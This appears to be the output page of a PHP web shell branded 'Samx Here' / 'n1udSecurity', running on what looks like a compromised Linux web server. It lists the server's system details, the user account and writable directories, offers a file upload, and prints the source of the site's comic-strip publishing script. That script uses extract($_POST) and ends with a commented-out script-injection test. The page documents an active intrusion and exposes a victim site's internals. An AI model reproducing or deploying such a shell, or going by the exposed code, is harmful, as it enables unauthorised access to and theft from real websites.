Samx Here
n1udSecurity


Server : Apache
System : Linux ks5.tuic.fr 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64
User : pragmatice ( 1003)
PHP Version : 8.2.24
Disable Function : NONE
Directory :  /home/pragmatice/public_html/test/pragmabd/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/pragmatice/public_html/test/pragmabd/publier_planche.php
<?php
session_start();
require('../commun/filters/filtre_abonne.php');
require("includes/constantes.php");
require("../pragmacompte/config/database.php");
require("../commun/includes/fonctions_communes.php");

$id_membre_connecte = $_SESSION['user']['id'];

// on traite le formulaire d'ajout de la planche s'il a été soumis
if (isset($_POST['bt_publier_cette_planche'])) {
    if (not_empty(['titre_p', 'auteur_p'])) {
        $errors = [];
        extract($_POST);// pour avoir accès à $_POST['titre_p'] avec $titre_p etc...

        // on lit le tableau des erreurs (affichées grâce à <?php include("partials/_errors.php"); dans les views)
        if (count($errors) == 0) {
			$ctn_entablo = json_decode($_POST['ctn_p']);
            $ctn_entablo[0][0] = $_POST['titre_p'];
            $ctn_entablo[0][1] = $_POST['auteur_p'];
            $ctn_entablo[0][2] = $_POST['categorie_p'];
            $ctn_corrige = json_encode($ctn_entablo);
            // on ajoute la planche dans la BDD
            set_flash("Félicitations ! La planche a été publiée.","success");
            $q = $db->prepare('INSERT INTO '.TABLE_PLANCHE.'(id_membre, titre, auteur, categorie, contenu) 
                            VALUES(:id_membre, :titre, :auteur, :categorie, :contenu)');
            $q->execute([
                'id_membre' => $id_membre_connecte,
                'titre' => eb($titre_p),//$titre_p au lieu de $_POST['titre_p'] parce qu'on a extract
                'auteur' => eb($auteur_p),
                'categorie' => eb($categorie_p),
                'contenu' => $ctn_corrige
            ]);
            redirect("planche.php?m=".$id_membre_connecte);
        }

    } else {
        $errors[] = "Merci de renseigner les champs titre et auteur.";
    }
}

// on récupère les infos des planches pour le membre sélectionné
$q = $db->prepare("SELECT * FROM ".TABLE_PLANCHE." WHERE id_membre = :id AND actif = 1 ORDER BY titre ASC");
$q->execute([
    'id' => $id_membre_connecte
]);
$planches = $q->fetchAll(PDO::FETCH_OBJ);
$q->closeCursor();

require("views/publier_planche.view.php");

?>



<!--
<script>
    var toto = "il était une fois";
</script>

<?php
 
$toto = '<script type="text/javascript">document.write(toto);</script>';
echo $toto;

?>
-->

SAMX